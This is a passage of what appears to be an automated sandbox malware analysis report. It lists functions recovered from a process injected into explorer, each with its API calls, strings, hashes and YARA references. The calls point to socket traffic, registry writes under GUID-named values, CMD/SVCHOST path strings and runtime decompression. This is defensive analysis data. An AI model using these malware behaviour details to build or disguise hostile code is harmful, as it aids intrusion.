                            • Part of subcall function 011C074C: Sleep.KERNEL32(?,?,00000000,011BAD47,?,?,00000000,011BADA3,?,?,?,011B9533,?,?,00000000,011B9D8B), ref: 011C0791
                          • GetFileType.KERNEL32 ref: 011BF524
                          • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 011BF562
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
                          • String ID:
                          • API String ID: 3473179607-0
                          • Opcode ID: f64f8010170075157073f0d416bcd48fd15ffc51d2c9a4094638c0bc8e013f0e
                          • Instruction ID: 839613e853f535cae55fd132cfee3902839586250a93ea6002e33ae9fde01b3e
                          • Opcode Fuzzy Hash: f64f8010170075157073f0d416bcd48fd15ffc51d2c9a4094638c0bc8e013f0e
                          • Instruction Fuzzy Hash: A0818F72301B8686EB189F29D8847997BA1F744B78F588329CB7A433E5EB38C056C745
                          Function 011A3AE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$EventObjectSingleWait
                          • String ID: d
                          • API String ID: 2857295742-2564639436
                          • Opcode ID: 4558024651b9797c860b064116df33477591bce0c340a5d85cdc73ea92fb8f89
                          • Instruction ID: 0806d30361654aa8c215e91f87c97c43e55fea07dbf0837f3591a42228cb07f7
                          • Opcode Fuzzy Hash: 4558024651b9797c860b064116df33477591bce0c340a5d85cdc73ea92fb8f89
                          • Instruction Fuzzy Hash: 9B71EE32305A4081EF78DB09F4D53B5A7A1F7E8709F911626A64E867B4EF3CC256C704
                          Function 011B42E0 Relevance: 10.6, APIs: 7, Instructions: 92timememorynetworkCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32 ref: 011B4340
                          • htons.WS2_32 ref: 011B436D
                            • Part of subcall function 011B4750: WSACreateEvent.WS2_32 ref: 011B4768
                            • Part of subcall function 011B4750: WSAEventSelect.WS2_32 ref: 011B478F
                            • Part of subcall function 011B4750: WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B455A), ref: 011B47E4
                            • Part of subcall function 011B4750: WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B455A), ref: 011B47F3
                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B43C0
                            • Part of subcall function 011B34E0: send.WS2_32 ref: 011B350C
                            • Part of subcall function 011B4630: WSACreateEvent.WS2_32 ref: 011B4648
                            • Part of subcall function 011B4630: WSAEventSelect.WS2_32 ref: 011B466F
                            • Part of subcall function 011B4630: WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B45A0), ref: 011B46C4
                            • Part of subcall function 011B4630: WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B45A0), ref: 011B46D3
                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4405
                            • Part of subcall function 011B34A0: recv.WS2_32 ref: 011B34CC
                          • und_memcpy.LIBCMTD ref: 011B4443
                          • LocalFree.KERNEL32 ref: 011B444D
                          • LocalFree.KERNEL32 ref: 011B445C
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$Timer$Local$ChangeCloseConcurrency::details::platform::__CreateEventsFreeMultipleQueueSelectWait$Allochtonsrecvsendund_memcpy
                          • String ID:
                          • API String ID: 2815282806-0
                          • Opcode ID: d1bf51ab6c0d8116abc62b867c138b0cedf2298b0cd6c7900fbeb20330e2b05e
                          • Instruction ID: 228911cedea9635adc36bd39225d89dbdb223c3200418ba48bf7f1e26822d9f3
                          • Opcode Fuzzy Hash: d1bf51ab6c0d8116abc62b867c138b0cedf2298b0cd6c7900fbeb20330e2b05e
                          • Instruction Fuzzy Hash: 6541B77A618B8486CB54DB1AE48075ABBB0F7C9B94F508016EF9E43B69CB3EC445CF00
                          Function 011B2E9C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71threadsynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateHandleThread$EventResume$ObjectSingleWait
                          • String ID: d
                          • API String ID: 738346648-2564639436
                          • Opcode ID: 5d8e8d8922dab83100b61e2e3f350e8ac7584528af8499e656fb4ee1fa77a34e
                          • Instruction ID: 0ba83c117a0664a4a3288885afb4f4ccc7efef25bac3cbd2a1d0ab1661142d75
                          • Opcode Fuzzy Hash: 5d8e8d8922dab83100b61e2e3f350e8ac7584528af8499e656fb4ee1fa77a34e
                          • Instruction Fuzzy Hash: F241A536208BC4C5DB78CB19F48439AB7A0F7C9B84F41412ADA9E47B68CF78C495CB41
                          Function 011BF880 Relevance: 10.6, APIs: 7, Instructions: 67COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: 1af85ed40ec5fe5925729e172f13b0619eafdd898deb4fdde66c2bcd196ed5c7
                          • Instruction ID: 4891d3be781abf40b88bba6e1d7efba37e1cdb0be7fef878a29acac80d8b9ae3
                          • Opcode Fuzzy Hash: 1af85ed40ec5fe5925729e172f13b0619eafdd898deb4fdde66c2bcd196ed5c7
                          • Instruction Fuzzy Hash: 7111363231064765D60E6F35EDC03EE7A50AB94BB6F4A1319EE360B3D1DB3884438761
                          Function 011C00C4 Relevance: 10.6, APIs: 7, Instructions: 67COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: f916ec779f3b3909533c4aee4f8641efd325b308d98421a274a97015631c8405
                          • Instruction ID: 43207f0d192420a6e5db6e2fd3a243a88753d0f8aa9925b2628d6c6a93bc5009
                          • Opcode Fuzzy Hash: f916ec779f3b3909533c4aee4f8641efd325b308d98421a274a97015631c8405
                          • Instruction Fuzzy Hash: E111273231064196D30E6F68ED803AEBA50ABA4FE6F4A4108EA150B391CB78C8818761
                          Function 011C30A0 Relevance: 10.6, APIs: 7, Instructions: 63COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _errno.LIBCMT ref: 011C30B9
                          • FlushFileBuffers.KERNEL32(?,00000000,00000000,011C2B4A,?,?,00000001,011C2BF3,?,?,?,?,?,011C0349), ref: 011C311C
                          • GetLastError.KERNEL32(?,00000000,00000000,011C2B4A,?,?,00000001,011C2BF3,?,?,?,?,?,011C0349), ref: 011C3126
                          • __doserrno.LIBCMT ref: 011C3136
                          • _errno.LIBCMT ref: 011C313D
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$BuffersErrorFileFlushLast__doserrno
                          • String ID:
                          • API String ID: 1845094721-0
                          • Opcode ID: eaa48e95c07d106bc380b8e278254a3f1cd83a11f50f2ee3ca91b8f95065ff35
                          • Instruction ID: b2d2f02a5ef89d05366f609a0f59c092e87d11857fb6e2dd8c283a9faacdab99
                          • Opcode Fuzzy Hash: eaa48e95c07d106bc380b8e278254a3f1cd83a11f50f2ee3ca91b8f95065ff35
                          • Instruction Fuzzy Hash: A911D3317106854AD71E6FB8E9D43AE6A71BBE0F94F09812CDB2607391DB788841C755
                          Function 011C33A4 Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_close_nolock_errno
                          • String ID:
                          • API String ID: 186997739-0
                          • Opcode ID: 773c676cbaad17fd7ccffa4336c236bbeb90efe55f47f68eeb1bf6bdf8e8be71
                          • Instruction ID: d24861dc185d63067825fd97a6b546285277ebd336fb92ea1d946371858e4bf4
                          • Opcode Fuzzy Hash: 773c676cbaad17fd7ccffa4336c236bbeb90efe55f47f68eeb1bf6bdf8e8be71
                          • Instruction Fuzzy Hash: 1611273262028556E31E6F35E9C43AEAA51BBA0FA1F99862CD63A077D1CB788441C724
                          Function 011B1BC0 Relevance: 10.6, APIs: 7, Instructions: 52filememoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                          • String ID:
                          • API String ID: 2550598358-0
                          • Opcode ID: fb08c3f44cab8cb537ddc1caec5fd8c485336597aab209f4fa5d9c0564146e40
                          • Instruction ID: 22681508df078266166273e6ab45af81c0fabfb2bf9537cebcfc6be9189ee93a
                          • Opcode Fuzzy Hash: fb08c3f44cab8cb537ddc1caec5fd8c485336597aab209f4fa5d9c0564146e40
                          • Instruction Fuzzy Hash: BD21B436618A8087E718DF29F49839AB7B0F3C57A4F600215EB9947BA8CF7DC855CB40
                          Function 011AE2B0 Relevance: 10.6, APIs: 7, Instructions: 52filememoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                          • String ID:
                          • API String ID: 2550598358-0
                          • Opcode ID: b3b551aaca53fccd4ae67340d2bdd3b7548046abc673dd5a7dd6b9128e2609e2
                          • Instruction ID: e5f2539672c8002f2a16baea140a1c7452bc16d658c6fea7645038511a8b9af5
                          • Opcode Fuzzy Hash: b3b551aaca53fccd4ae67340d2bdd3b7548046abc673dd5a7dd6b9128e2609e2
                          • Instruction Fuzzy Hash: 6B21A736219A4483D718AF59F45435ABBB0F7C57A4F500629EB9983BA8DF7DC445CF00
                          Function 011A2230 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 51COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowsDirectoryW.KERNEL32 ref: 011A2253
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • GetSystemDirectoryW.KERNEL32 ref: 011A2295
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Directory$SystemWindows_errno_invalid_parameter_noinfo
                          • String ID: %s\CMD.EXE$%s\EXPLORER.EXE$%s\SVCHOST.EXE
                          • API String ID: 3092845267-3707798339
                          • Opcode ID: 46e7bb4ff8f1aebdfd4eb7e0c7df188c2aa70b52b7c59ab06d928eab087db82e
                          • Instruction ID: a17700f7b862af972b6ab736ee2bcdfd15393ae1eebd7980d62c5758d8932eb7
                          • Opcode Fuzzy Hash: 46e7bb4ff8f1aebdfd4eb7e0c7df188c2aa70b52b7c59ab06d928eab087db82e
                          • Instruction Fuzzy Hash: 1911217561C685C3EB0CDB51E8803DA6B64F7D6758F504026FB8757A58CB7CC881CB91
                          Function 01194710 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • RegOpenKeyW.ADVAPI32 ref: 0119474E
                          • RegSetValueExW.ADVAPI32 ref: 01194789
                          • RegCloseKey.ADVAPI32 ref: 01194798
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenValue_errno_invalid_parameter_noinfo
                          • String ID: SOFTWARE\%s${7EE6EBB8-7FBC-4C3E-AAB8-F5FE9571F428}
                          • API String ID: 2168760479-1494669752
                          • Opcode ID: 939a899e7ea8db28a757730d9663b4bab80499fce987b8791b7c3842192692b5
                          • Instruction ID: 49ec6aeff1644f9fd051ed3c0074d58d62b03d0ed00b4af21824c93beae65697
                          • Opcode Fuzzy Hash: 939a899e7ea8db28a757730d9663b4bab80499fce987b8791b7c3842192692b5
                          • Instruction Fuzzy Hash: 5A114075224A8596EB58DF25F8547DE73A0F785B84F804125A79A83BA8DF7CC106CB40
                          Function 01197770 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32 ref: 0119778A
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • RegGetValueW.ADVAPI32 ref: 011977FC
                          • LocalFree.KERNEL32 ref: 01197820
                          Strings
                          • {F711BB4E-52A0-4F2C-BD3A-54EB0B2E6079}, xrefs: 011977A1
                          • {B754ECBA-7F6B-46D7-8AE7-AE4B2FDCD1C1}, xrefs: 011977E9
                          • SOFTWARE\%s, xrefs: 011977A8
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocFreeValue_errno_invalid_parameter_noinfo
                          • String ID: SOFTWARE\%s${B754ECBA-7F6B-46D7-8AE7-AE4B2FDCD1C1}${F711BB4E-52A0-4F2C-BD3A-54EB0B2E6079}
                          • API String ID: 3172112264-3335224962
                          • Opcode ID: 4a1286ad05cb3682face972baaa7493cd4c3cd92e28d625ee39da449b929514c
                          • Instruction ID: 7573a13bc64419cb817599b0d3a5ad2e6f161bcde55623cad04d2851442a64ad
                          • Opcode Fuzzy Hash: 4a1286ad05cb3682face972baaa7493cd4c3cd92e28d625ee39da449b929514c
                          • Instruction Fuzzy Hash: D111F331218B8582EB58DB54F4483DAB3B4F785758FA00229E79D87BA8DF7DC54ACB40
                          Function 011A3A60 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: NTDLL.DLL$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize
                          • API String ID: 667068680-1459209654
                          • Opcode ID: 99c34056dace75a87c6772c8f9530ccf68f2bd4aaada53c51aa2ff5587048d9e
                          • Instruction ID: 2409bea6a0dd9b8cd4fcfd8ff5587ba654fe15755245f1de06b99da26104feb7
                          • Opcode Fuzzy Hash: 99c34056dace75a87c6772c8f9530ccf68f2bd4aaada53c51aa2ff5587048d9e
                          • Instruction Fuzzy Hash: E3F0A435954F5882E72D9B18F8983E537A0F794748F8445269B8A82274EF7CC29AC681
                          Function 011BB0E4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 20COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _getptd.LIBCMT ref: 011BB103
